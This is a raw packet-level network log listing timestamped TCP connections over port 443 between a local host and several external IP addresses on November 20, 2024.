                                                                                                                                                                                                Nov 20, 2024 10:54:23.782998085 CET49747443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:23.783310890 CET49747443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:23.783328056 CET44349747188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.070869923 CET4434974213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.071336031 CET49742443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.071352959 CET4434974213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.071863890 CET49742443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.071868896 CET4434974213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.174199104 CET4434974213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.174329996 CET4434974213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.174431086 CET49742443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.174612999 CET49742443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.174626112 CET4434974213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.174643040 CET49742443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.174654007 CET4434974213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.177231073 CET49748443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.177244902 CET4434974813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.178256035 CET49748443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.178500891 CET49748443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.178510904 CET4434974813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.194536924 CET4434974313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.198617935 CET49743443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.198632956 CET4434974313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.199187994 CET49743443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.199193001 CET4434974313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.199995995 CET4434974513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.202455997 CET49745443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.202480078 CET4434974513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.202888012 CET49745443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.202893972 CET4434974513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.213843107 CET4434974413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.214251995 CET49744443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.214267015 CET4434974413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.214684963 CET49744443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.214690924 CET4434974413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.290422916 CET44349747188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.290684938 CET49747443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:24.291879892 CET49747443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:24.291891098 CET44349747188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.292218924 CET44349747188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.294156075 CET49747443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:24.294305086 CET49747443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:24.294354916 CET44349747188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.294414043 CET49747443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:24.294420958 CET44349747188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.306432009 CET4434974613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.306977034 CET49746443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.306989908 CET4434974613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.307519913 CET49746443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.307523966 CET4434974613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.328423023 CET4434974313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.328593969 CET4434974313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.328702927 CET49743443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.329035997 CET49743443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.329035997 CET49743443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.329045057 CET4434974313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.329052925 CET4434974313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.331674099 CET49749443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.331687927 CET4434974913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.331758976 CET49749443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.332510948 CET49749443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.332525015 CET4434974913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.336199045 CET4434974513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.336275101 CET4434974513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.336371899 CET49745443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.340059042 CET4434974413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.340112925 CET4434974413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.340178013 CET49744443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.340934992 CET49745443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.340954065 CET4434974513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.340965986 CET49745443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.340971947 CET4434974513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.341042042 CET49744443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.341053009 CET4434974413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.341077089 CET49744443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.341082096 CET4434974413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.343570948 CET49750443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.343581915 CET4434975013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.343626022 CET49751443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.343633890 CET4434975113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.343652964 CET49750443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.343677998 CET49751443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.343801975 CET49750443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.343811035 CET4434975013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.343858957 CET49751443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.343868971 CET4434975113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.408771992 CET4434974613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.408821106 CET4434974613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.409012079 CET49746443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.409122944 CET49746443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.409127951 CET4434974613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.409161091 CET49746443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.409164906 CET4434974613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.412312031 CET49752443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.412334919 CET4434975213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.412487030 CET49752443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.412623882 CET49752443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.412636042 CET4434975213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.985991001 CET4434975113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.986572027 CET4434974813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.986793041 CET49751443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.986805916 CET4434975113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.987535954 CET49751443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.987540007 CET4434975113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.988001108 CET49748443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.988009930 CET4434974813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.988405943 CET49748443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.988414049 CET4434974813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.991744995 CET4434974913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.992194891 CET49749443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.992203951 CET4434974913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:24.992630959 CET49749443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:24.992635965 CET4434974913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.029028893 CET4434975013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.029448032 CET49750443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.029455900 CET4434975013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.030067921 CET49750443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.030071974 CET4434975013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.057920933 CET4434975213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.058371067 CET49752443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.058387041 CET4434975213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.058936119 CET49752443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.058940887 CET4434975213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.063245058 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                                Nov 20, 2024 10:54:25.063322067 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                                Nov 20, 2024 10:54:25.095051050 CET4434974813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.095211983 CET4434974813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.095422029 CET49748443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.095422029 CET49748443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.095484018 CET49748443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.095488071 CET4434974813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.096909046 CET4434975113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.096982002 CET4434975113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.097027063 CET49751443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.098264933 CET49753443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.098279953 CET49751443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.098289013 CET4434975113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.098310947 CET4434975313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.098324060 CET49751443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.098330021 CET4434975113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.098371983 CET49753443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.099374056 CET49753443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.099391937 CET4434975313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.100526094 CET49754443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.100545883 CET4434975413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.100605011 CET49754443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.100771904 CET49754443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.100781918 CET4434975413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.102576017 CET4434974913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.102734089 CET4434974913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.102785110 CET49749443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.102828026 CET49749443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.102832079 CET4434974913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.102844954 CET49749443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.102848053 CET4434974913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.104809046 CET49755443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.104829073 CET4434975513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.104881048 CET49755443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.105032921 CET49755443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.105051041 CET4434975513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.143394947 CET4434975013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.143450975 CET4434975013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.143498898 CET49750443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.143661976 CET49750443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.143672943 CET4434975013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.143687010 CET49750443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.143691063 CET4434975013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.146246910 CET49756443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.146312952 CET4434975613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.146387100 CET49756443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.146549940 CET49756443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.146583080 CET4434975613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.163914919 CET4434975213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.163976908 CET4434975213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.164033890 CET49752443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.164338112 CET49752443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.164350986 CET4434975213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.164362907 CET49752443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.164367914 CET4434975213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.166954994 CET49757443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.166992903 CET4434975713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.167074919 CET49757443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.167262077 CET49757443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.167278051 CET4434975713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.203881025 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                Nov 20, 2024 10:54:25.404753923 CET44349747188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.404863119 CET44349747188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.405111074 CET49747443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:25.405111074 CET49747443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:25.605876923 CET49758443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:25.605916977 CET44349758188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.606013060 CET49758443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:25.606475115 CET49758443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:25.606487036 CET44349758188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.719511032 CET49747443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:25.719535112 CET44349747188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.741683960 CET4434975413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.742294073 CET49754443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.742306948 CET4434975413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.742780924 CET49754443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.742785931 CET4434975413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.761931896 CET4434975313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.762445927 CET49753443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.762469053 CET4434975313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.762968063 CET49753443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.762978077 CET4434975313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.787866116 CET4434975513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.788441896 CET49755443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.788464069 CET4434975513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.788873911 CET49755443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.788878918 CET4434975513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.804913044 CET4434975613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.805386066 CET49756443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.805408955 CET4434975613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.805763960 CET49756443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.805769920 CET4434975613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.844799995 CET4434975413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.844861031 CET4434975413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.844913960 CET49754443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.845227003 CET49754443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.845242023 CET4434975413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.845254898 CET49754443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.845259905 CET4434975413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.848412991 CET49759443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.848438978 CET4434975913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.848548889 CET49759443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.848773003 CET49759443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.848788023 CET4434975913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.850841045 CET4434975713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.851288080 CET49757443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.851322889 CET4434975713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.851803064 CET49757443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.851809978 CET4434975713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.865391970 CET4434975313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.865562916 CET4434975313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.865665913 CET49753443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.865665913 CET49753443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.865712881 CET49753443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.865729094 CET4434975313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.868335009 CET49760443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.868377924 CET4434976013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.868469000 CET49760443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.868700981 CET49760443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.868716955 CET4434976013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.889581919 CET4434975513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.889941931 CET4434975513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.890053034 CET49755443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.890093088 CET49755443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.890093088 CET49755443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.890110016 CET4434975513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.890120029 CET4434975513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.892796040 CET49761443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.892824888 CET4434976113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.892905951 CET49761443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.893102884 CET49761443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.893115997 CET4434976113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.910192966 CET4434975613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.910255909 CET4434975613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.910329103 CET49756443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.910567045 CET49756443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.910579920 CET4434975613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.910617113 CET49756443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.910623074 CET4434975613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.913418055 CET49762443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.913461924 CET4434976213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.913784981 CET49762443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.913784981 CET49762443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.913822889 CET4434976213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.957036018 CET4434975713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.957099915 CET4434975713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.957145929 CET49757443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.957459927 CET49757443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.957469940 CET4434975713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.957482100 CET49757443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.957487106 CET4434975713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.961021900 CET49763443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.961054087 CET4434976313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:25.961121082 CET49763443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.961344957 CET49763443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:25.961359978 CET4434976313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.082815886 CET44349758188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.082894087 CET49758443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:26.084577084 CET49758443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:26.084583044 CET44349758188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.084899902 CET44349758188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.086163044 CET49758443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:26.086247921 CET49758443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:26.086282969 CET44349758188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.086359024 CET49758443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:26.086364031 CET44349758188.114.96.3192.168.2.7
